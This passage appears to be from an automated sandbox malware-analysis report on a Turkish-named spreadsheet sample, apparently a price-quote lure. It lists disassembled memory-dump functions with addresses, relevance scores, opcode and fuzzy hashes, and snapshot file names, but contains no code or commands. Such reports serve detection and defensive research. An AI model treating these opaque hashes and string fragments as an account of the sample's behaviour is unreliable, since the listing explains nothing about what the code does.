                                                  • Opcode ID: d081500d80c9fd2509cdcef194c5fa218c16d6d9c87efa8d770d68c5981d2976
                                                  • Instruction ID: 4c25ae3c703443d198e40601537b35217d6b7eda5f83fc597cfeb7b987cd9b84
                                                  • Opcode Fuzzy Hash: d081500d80c9fd2509cdcef194c5fa218c16d6d9c87efa8d770d68c5981d2976
                                                  • Instruction Fuzzy Hash: 4171E774E056198FDB18DF6AD988A9ABBF3BF88300F14C1E9D408A7255DB319E81DF50
                                                  Function 03118540 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: 4a936043df534b25a6f454920cc9a764da85e494b3df7186db05c0aca5cced7e
                                                  • Instruction ID: 9202f27c8daeb604cf68ae2cec8e5e33e822f5d8c3c106a8e15b58f65ee8f3c3
                                                  • Opcode Fuzzy Hash: 4a936043df534b25a6f454920cc9a764da85e494b3df7186db05c0aca5cced7e
                                                  • Instruction Fuzzy Hash: 4E71EBB0A426498FD748DFABE95069E7BF6FFD9700F14C539D0089B268DB385846CB81
                                                  Function 05AE7558 Relevance: 1.9, Strings: 1, Instructions: 602COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  • Opcode ID: c5ef2421792d06a9f791f50a9ac9d4a5e3ebcba4465f3eab3c66e35e3d607f66
                                                  • Instruction ID: 7c97281e2ccba0fb053afdf9976f2af64a2f433ecf804c6fb9e9557647283c09
                                                  • Opcode Fuzzy Hash: c5ef2421792d06a9f791f50a9ac9d4a5e3ebcba4465f3eab3c66e35e3d607f66
                                                  • Instruction Fuzzy Hash: 193279B0B006569FCB08DF69C494A7EFBF2FB88300F148569D56AD7391DB34A902DB90
                                                  Function 05B66E5B Relevance: 1.6, Instructions: 1600COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: true
                                                  • Associated: 00000000.00000002.2063212009.0000000005BB0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b60000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                  • Instruction ID: 37e53d85e376fec24e39db1b71a435460122d50e31ed6c3fa1784857cd8b45e5
                                                  • Opcode Fuzzy Hash: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                  • Instruction Fuzzy Hash: 32C2786240E3C25FD7138B749DB6AE17FB1EE2321871E09DBD4C18F063E618694AD762
                                                  Function 05ADDCA8 Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq
                                                  • API String ID: 0-3092978723
                                                  • Opcode ID: 11e5e05bcbc4edd5fb62c261deae77a1788a5aca8ac6dd577d7ea30589f52048
                                                  • Instruction ID: c5d99d1f11d083d3612923a598dfc00f7b83aca83fabcb4eda8c35bae5da95e2
                                                  • Opcode Fuzzy Hash: 11e5e05bcbc4edd5fb62c261deae77a1788a5aca8ac6dd577d7ea30589f52048
                                                  • Instruction Fuzzy Hash: A4E12A34A402058FCB14EF69C588E69F7F6BF88710F29C499E4169B366D731EC81CB60
                                                  Function 057E5F2A Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &
                                                  • API String ID: 0-1010288
                                                  • Opcode ID: 451e0c4f5c21bc3b6ffb5462814b1670b137ab19b03b8c249e743354cf35844c
                                                  • Instruction ID: b36250cc45182c6f5fa4225b11cc1869e285f0b419b18776a153bb4b20cd98b9
                                                  • Opcode Fuzzy Hash: 451e0c4f5c21bc3b6ffb5462814b1670b137ab19b03b8c249e743354cf35844c
                                                  • Instruction Fuzzy Hash: D831AB71E056588FDB59CF6B9C4429ABBF3AFC9300F18C1FA844CAA265DB3409869F11
                                                  Function 057EB768 Relevance: .4, Instructions: 431COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b55107cc693dd9c1f1ce2ce77854d6c8986d17bec8d0ca488a8ed5445d024341
                                                  • Instruction ID: 226bcef825ff1647d17ec5a38d9ca711cc9684aec31220b6fcf426af517ecbac
                                                  • Opcode Fuzzy Hash: b55107cc693dd9c1f1ce2ce77854d6c8986d17bec8d0ca488a8ed5445d024341
                                                  • Instruction Fuzzy Hash: B112B370E046198FDB14CFAAC98069DFBF2FF88304F24C169D459AB21AD734A946CF90
                                                  Function 05E00040 Relevance: .3, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2067cec3fc4fcc5952b184e732202a9e6767c514e4b4fbb1a10fd1296230eea4
                                                  • Instruction ID: 41f2e8730a53f2c9d35ea9daf516d0cff0a2b5a871e8aa9a99c224f6e8e63b23
                                                  • Opcode Fuzzy Hash: 2067cec3fc4fcc5952b184e732202a9e6767c514e4b4fbb1a10fd1296230eea4
                                                  • Instruction Fuzzy Hash: 54C113B4E06248CFDB54CFA9D888BEDBBF2FB49304F50A069D449AB291DB745984CF01
                                                  Function 05E00035 Relevance: .3, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 46766b235968d0dad85b1b0bfda6d0812cc4328390200427a000fd75824c99dc
                                                  • Instruction ID: d5a5b8dd722247f48ce033d2e2cff24b9b57c3477b4010d1c5258ac9185d7362
                                                  • Opcode Fuzzy Hash: 46766b235968d0dad85b1b0bfda6d0812cc4328390200427a000fd75824c99dc
                                                  • Instruction Fuzzy Hash: 54C104B4E06258CFDB54CFA9D888BADBBF2FB49304F50A069D449AB291DB745984CF01
                                                  Function 057E2FA9 Relevance: .2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c0c5d80b45be4bf387be8320ce20a080775f37a387b4b8ba4f058f8967f980fd
                                                  • Instruction ID: 910147451c34df7409efdb704cd5a3d8615b45a3a8149a9252b5bf28b99d5a5a
                                                  • Opcode Fuzzy Hash: c0c5d80b45be4bf387be8320ce20a080775f37a387b4b8ba4f058f8967f980fd
                                                  • Instruction Fuzzy Hash: 9F91DE70E05318CBDF05CFA9C5487EDBBF2BB88314F10886AC109B7250E7796945EB65
                                                  Function 057E2FB8 Relevance: .2, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 592893327ffc7252d6431c61b917c7ee72e4c8d8c47fabb92be4fd0145ff54dc
                                                  • Instruction ID: 1e35b24d55f3bbe101161e174977fee35bf69cd32ef696b92b0187957ea9a981
                                                  • Opcode Fuzzy Hash: 592893327ffc7252d6431c61b917c7ee72e4c8d8c47fabb92be4fd0145ff54dc
                                                  • Instruction Fuzzy Hash: 9491CBB4E05318CBDF05CFA9C5487EEBBF2BB48314F10882AC509B7250E7796A45EB65
                                                  Function 05E06331 Relevance: .2, Instructions: 196COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a661bedc6b221ec2ea0ac32389a69b57828370fa8653f000f732ee6b3f370396
                                                  • Instruction ID: e38dbaeefdd6c566e09453f627d082abacb9e147a012f6e02491c4deac3dbf68
                                                  • Opcode Fuzzy Hash: a661bedc6b221ec2ea0ac32389a69b57828370fa8653f000f732ee6b3f370396
                                                  • Instruction Fuzzy Hash: B6811CB0E05208CFDB44DFA9E594BEDBBF2FB49301F50A129E40AA7294DB349891CF54
                                                  Function 05E3D3D8 Relevance: .2, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c5b6528d9a939afd1d2a014c6fa2231ac8aa51bba8a8c6735846c4d2451548a0
                                                  • Instruction ID: 63e3c2f944b9e4925d95ea1ade871de91a4ad0f7f55ceb0c106ff1e2ab95a17c
                                                  • Opcode Fuzzy Hash: c5b6528d9a939afd1d2a014c6fa2231ac8aa51bba8a8c6735846c4d2451548a0
                                                  • Instruction Fuzzy Hash: 3581F770E14218CFDB24DFA9CE49BEDBBB2BF49344F10A0A9D059AB251DB745985CF01
                                                  Function 05E06340 Relevance: .2, Instructions: 194COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7db98ee402370c0bc16d78cd5b57edde53242add6cb81b9635299054742ed54e
                                                  • Instruction ID: 22bd8ceb6037086c25f70bcc60eb0a2260210e35913711c3623829283937f4f4
                                                  • Opcode Fuzzy Hash: 7db98ee402370c0bc16d78cd5b57edde53242add6cb81b9635299054742ed54e
                                                  • Instruction Fuzzy Hash: 86711B70E05208CFDB44DFA9E554BEDBBF2FB89301F50A129E40AA7294DB389891CF54
                                                  Function 05AEB1D8 Relevance: .1, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5fab77de7e4ac0a2b4f489f363f62fa95b2b63868dde403d2c0b98c7e6d14533
                                                  • Instruction ID: bcda0dd5a88cef44d850b94c3777a37372aa6119be30a75e71e3b1e2b0690420
                                                  • Opcode Fuzzy Hash: 5fab77de7e4ac0a2b4f489f363f62fa95b2b63868dde403d2c0b98c7e6d14533
                                                  • Instruction Fuzzy Hash: 7551BEB4906208CFDB14CFAAE589BEDBBB6FF49300F10512AD005A7291D7749986CF24
                                                  Function 05AEB1CB Relevance: .1, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de23793e2bc0760059be0e691a16110effbd43c589b1781ca78d73d6f69cb54e
                                                  • Instruction ID: 9861344dbd7939b34137ef985a3c633d66cf053b5dd0a1c07816411fd80e160f
                                                  • Opcode Fuzzy Hash: de23793e2bc0760059be0e691a16110effbd43c589b1781ca78d73d6f69cb54e
                                                  • Instruction Fuzzy Hash: 7F51DFB4A06208CFDB14CFAAE589BEDBBF2FF49310F10512AD405A7291D7749986CF24
                                                  Function 057EB758 Relevance: .1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc20386991adbaa8d3569c49f1fe78161e970e7b95346d252b59ac7d03eb04f9
                                                  • Instruction ID: 6d4dcc5fdbe11efbdafa6447b288ad97db4e98461a48a7aeee8d3801f98a8944
                                                  • Opcode Fuzzy Hash: dc20386991adbaa8d3569c49f1fe78161e970e7b95346d252b59ac7d03eb04f9
                                                  • Instruction Fuzzy Hash: D24179B5E016198BDB18CFABC94059EFBF3BFC8310F18C07AD948AB224EB3459458B54
                                                  Function 05AD54F1 Relevance: .1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f659a0f7d27fb43c5fe29acd9fe112bae742b0e301e1c9ae79807f7dfdb920e9
                                                  • Instruction ID: 026b3701a429e801920dca5fe62c296cb94da0270abd56948556b209e552b1ab
                                                  • Opcode Fuzzy Hash: f659a0f7d27fb43c5fe29acd9fe112bae742b0e301e1c9ae79807f7dfdb920e9
                                                  • Instruction Fuzzy Hash: 6F614A74E106288FDBA4DF6CC885B8DBBF1BF48318F1485E9D458E6216D730AA85CF01
                                                  Function 05AD0006 Relevance: .1, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a9a409e6fa35c7d43d20726823bc9241ab3770f92e0de50db89fd05d9b8e879
                                                  • Instruction ID: 7c14729a84385f83523654b001a565b29c37b9fddd0ef490f6bb4ea1d5ca8ca6
                                                  • Opcode Fuzzy Hash: 5a9a409e6fa35c7d43d20726823bc9241ab3770f92e0de50db89fd05d9b8e879
                                                  • Instruction Fuzzy Hash: D1416B71D05A588FEB1DCF6B9C4069AFBF3AFC9201F58C1BA844DAA265EB340542CF11
                                                  Function 05E20040 Relevance: .1, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8fc26626259fcebb365dc23aabd9733e6ad2894d58b12d6005897d4b9a50a14
                                                  • Instruction ID: 6360e523e04467464343476c2bea9497d20ed1605c674e74717842efd64c74d8
                                                  • Opcode Fuzzy Hash: c8fc26626259fcebb365dc23aabd9733e6ad2894d58b12d6005897d4b9a50a14
                                                  • Instruction Fuzzy Hash: AF51C574D056298FEB68DF2ADC487D9BAF2BB98300F00D0EAD51DA7254EB741E858F11
                                                  Function 05AD0040 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 09df231247783d1b64a91abe374a028d97d59b48790918d275c738ff3901ccd2
                                                  • Instruction ID: e0db66285676ccad087bcfc30811eba62dcd194c03d80a3c13b33e720b7f7e26
                                                  • Opcode Fuzzy Hash: 09df231247783d1b64a91abe374a028d97d59b48790918d275c738ff3901ccd2
                                                  • Instruction Fuzzy Hash: A9415D71D05A588BEB1CCF6B9D4469EFAF3BFC8201F14C1B9940DA6255EB304586CF11
                                                  Function 05B17D79 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05a8154cce69de73f93f2be42f70e24768c56f06b907908caf05c09eb469e85e
                                                  • Instruction ID: 046a0479d46ed2f5e2fde4401281f240c3b6cd63c5fe2611b4e800c62b3ac65c
                                                  • Opcode Fuzzy Hash: 05a8154cce69de73f93f2be42f70e24768c56f06b907908caf05c09eb469e85e
                                                  • Instruction Fuzzy Hash: 6541DEB5C052589FCB00CFA9D584AEEFBF5BF09310F14906AE415B7240C738AA85CFA8
                                                  Function 05B17D80 Relevance: .1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25de58e6b6c367dbdf8c576cb41e02fe9c6fa2f88820d55e6caf632b2edf31d2
                                                  • Instruction ID: 9eb4602c1c76df768c5af47ef28e56095dcaa8a50566ee33b78324c4d5a9e766
                                                  • Opcode Fuzzy Hash: 25de58e6b6c367dbdf8c576cb41e02fe9c6fa2f88820d55e6caf632b2edf31d2
                                                  • Instruction Fuzzy Hash: CB41DEB5C052589FCB00CFA9D484AEEFBF5AF09310F14906AE415B7240C738AA85CFA8
                                                  Function 03118F60 Relevance: .1, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b671a6960a873ae9a0299b5592fc8f36da30cee58bbabc5e0953c0ec463703a
                                                  • Instruction ID: b7b9b0e6681e363d77604d38ad8ac872ff10c54c8457fa991740c4c007200533
                                                  • Opcode Fuzzy Hash: 3b671a6960a873ae9a0299b5592fc8f36da30cee58bbabc5e0953c0ec463703a
                                                  • Instruction Fuzzy Hash: 6F4186B0D016288BEB68CF6BDD5879EFAF6BF89304F14C1A9C518A7264DB740985CF41
                                                  Function 05E20007 Relevance: .1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3ffaab0035b2ae9fc8a9b4511b01875c35e331871e02444a4b14a399e1b9ac5
                                                  • Instruction ID: 89eb3b7621bbb26658d684f208060959d5e37fd7be14fbd17ad90a5e68fa0fba
                                                  • Opcode Fuzzy Hash: d3ffaab0035b2ae9fc8a9b4511b01875c35e331871e02444a4b14a399e1b9ac5
                                                  • Instruction Fuzzy Hash: 1A31FBB1D087658FEB29CF2BCC49799BBF3AF85304F04C0EAD4489A255EB740A859F11
                                                  Function 057E4611 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dcf8fe6438eedb45e296ec0c16d42c20705b9fdb29cb4993551e88dd4ed4485c
                                                  • Instruction ID: 4562ecf5dec30d5355118ac7f930906a5a8bc6566561e5d5047e43667088376a
                                                  • Opcode Fuzzy Hash: dcf8fe6438eedb45e296ec0c16d42c20705b9fdb29cb4993551e88dd4ed4485c
                                                  • Instruction Fuzzy Hash: ED3130B1D056549BEF19CF6BD8846E9BBB3AFCA300F14C0FAD4486A214CB321A55DF41
                                                  Function 05B13628 Relevance: .1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 708e12ed26507663608ec2d651689b930f1740792d5b8eaf3929be857f3a0e08
                                                  • Instruction ID: d1aa9621f4e01eaad6685cbbbe0e53116efabb79bf216046ae8cc707bc51d55a
                                                  • Opcode Fuzzy Hash: 708e12ed26507663608ec2d651689b930f1740792d5b8eaf3929be857f3a0e08
                                                  • Instruction Fuzzy Hash: 3721FDB5C042089FCB10DFA9D980AEEBBF5FB49310F14906AE809B3310C735A945CFA4
                                                  Function 03118F5D Relevance: .1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a046172c690e9d88cceeee44956de79996ec7386dd7a7350736e6a0ceebc20c
                                                  • Instruction ID: e14f72a3511241c1589fb5e511e2ee606480100ec5091d7e5eaad942a1acbd24
                                                  • Opcode Fuzzy Hash: 7a046172c690e9d88cceeee44956de79996ec7386dd7a7350736e6a0ceebc20c
                                                  • Instruction Fuzzy Hash: 193142B1E116188BEB28CF6BDD5478AFAF7BFC9304F04C1A9C408AA264DB7505868F41
                                                  Function 05B13630 Relevance: .1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3fb0d024396a039e39cfae5d1f0046e5758ed84d96a9b2218c1ca5faa0ba9dcb
                                                  • Instruction ID: e7b81d9b67cc739c731bbe8430e0b754864f2584716f000056f66eaf24f194e8
                                                  • Opcode Fuzzy Hash: 3fb0d024396a039e39cfae5d1f0046e5758ed84d96a9b2218c1ca5faa0ba9dcb
                                                  • Instruction Fuzzy Hash: CB21DDB5D042089BCB14DFA9D980AEEBBF5BB49310F10906AE809B7210C735A945CFA4
                                                  Function 05AEE8A0 Relevance: .1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3bf647a714f79b59d5f4524968882b7da744d3abad0730e72aac6d26bffb3b1
                                                  • Instruction ID: 2e62208a216d4abffe6a438090f8de181c1b7f4f390a0eda0b356a724a2e033f
                                                  • Opcode Fuzzy Hash: d3bf647a714f79b59d5f4524968882b7da744d3abad0730e72aac6d26bffb3b1
